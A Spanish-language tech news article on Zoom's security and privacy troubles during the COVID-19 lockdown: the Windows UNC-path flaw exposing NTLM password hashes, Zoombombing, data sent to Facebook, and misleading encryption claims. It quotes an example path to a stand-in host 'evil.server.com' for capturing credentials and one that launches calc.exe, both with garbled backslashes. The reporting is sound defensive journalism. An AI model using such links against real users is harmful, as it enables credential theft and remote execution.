Tras una era inicial donde las videollamadas eran prácticamente monopolio de un Skype con los años venida a menos, Zoom emerge con fuerza arropada por un confinamiento de alcance global que exige tanto teletrabajo como reuniones virtuales.

No hay más que mirar los datos en Sensor Tower, que apuntan a 77 millones de descargas durante marzo, contando únicamente sus aplicaciones móviles. Visto de otra forma, sería un nivel de descargas que multiplica por cerca de 20 su volumen en varios países europeos. En España, la descarga se multiplicó por hasta 27 durante la primera semana de confinamiento, todavía por debajo de las hasta 55 veces de Italia.

Crecimiento de las descargas de las plataformas de vídeo durante la cuarentena por la COVID-19
App Annie vía TechCrunch

Pero no son todo buenas noticias para una compañía que veía hace tan solo unos días popularizarse el término 'Zoombombing' como método de 'troleo' desde usuarios no invitados, arruinando las llamadas con contenido gráfico o vídeos impactantes.

11 consejos para evitar que tu vida colapse mientras teletrabajas por el coronavirus

Las contraseñas de Zoom en Windows, expuestas al peligro

Ahora, tras una publicación de investigadores de seguridad informática que leemos en el medio especializado en ciberseguridad Bleeping Computer, Zoom se enfrenta a una gran brecha de seguridad en la que está exponiendo las contraseñas de sus millones de usuarios sobre dispositivos con sistema operativo Windows.

Y es que, sobre la misma implementación que permite que, cuando enviamos enlaces a webs estos sean clicables, podemos enviar también enlaces a las denominadas rutas UNC como "\evil.server.comimagescat.jpg", en las que, según han comprobado varios expertos, sería posible obtener los nombres de usuario y contraseñas de Zoom en formato cifrado y hasheado NTML.

Brecha de seguridad en Zoom para Windows
Bleeping Computer

Esto no sería un problema, de no ser porque los sistemas domésticos hoy en día ya son lo suficientemente potentes como para romper este cifrado en apenas unos instantes. En el caso de Bleeping Computer, les bastó con 16 segundos de potencia gráfica para obtener las contraseñas.

Asimismo, esta problemática se extiende a otras partes del sistema operativo, expandiendo el riesgo mediante la ejecución de software en remoto. Por ejemplo, podríamos abrir aplicación de calculadora simplemente enviando un mensaje que contenga la ruta "\127.0.0.1C$windowssystem32calc.exe".

En este caso, aunque no obstante aparecerá una advertencia de seguridad en el sistema en el que está intentando ejecutar la aplicación, es probable que muchos usuarios desconozcan a qué se refiere este aviso y puedan efectuar la típica maniobra de "siguiente, siguiente" que tan bien conocemos todos.

Por tanto, lo más seguro sería que, en medida de lo posible intentemos utilizar Zoom con usuarios de confianza, así como intentar no hacer click en enlaces de forma sospechosa y de este estilo, y restringiendo los ajustes de seguridad que vienen definidos por defecto. Al menos, hasta que Zoom haya reconocido la causa del problema y haya puesto una actualización por la cual esto deje de ser posible.

Conflictos y problemas de privacidad

También recientemente, durante el pasado fin de semana, Zoom se enfrentaba a otro escándalo de privacidad en torno a una aplicación de iOS que tuvo que ser actualizada, según afirmaba Motherboard, tras ser cazada in fraganti enviando datos a los servidores de Facebook cuando los usuarios abrían la aplicación con fines publicitarios.

Este tipo de usos, que por desgracia son relativamente normales en muchos de los servicios más desconsiderados con nuestra privacidad, ha de ser no obstante incluido en las políticas que aceptamos al entrar en ellos. Zoom no dejaba nada claro este punto, por lo que tuvo que modificarlas el pasado lunes, según contaba Consumer Reports.

Pero también recientemente vimos como, a pesar de la proclama de que es posible "asegurar una reunión con una cifrado de punta a punta" que podemos leer en su web, finalmente tuvo que reconocer ante la publicación The Intercept que, definitivamente, "no es posible habilitar el cifrado punta a punta para las reuniones de video de Zoom".

‘STOP Touching Your Face!’, la extensión para Chrome que te protege del coronavirus

En esta situación, es hasta el propio FBI quien ha salido públicamente a avisar, durante la crisis de la enfermedad COVID-19 causada por el nuevo coronavirus, de los riesgos que implica esta herramienta de videollamadas a muchos usuarios.

Entre ellos se encuentran sesiones de trabajo de todo tipo, desde clases a niños hasta las conversaciones entre directivos y dirigentes políticos –españoles y extranjeros- del más alto rango.

YouTube video

Recibe cada mañana nuestra newsletter. Una guía para entender lo que importa en relación con la tecnología, la ciencia y la cultura digital.

Procesando...
¡Listo! Ya estás suscrito

También en Hipertextual: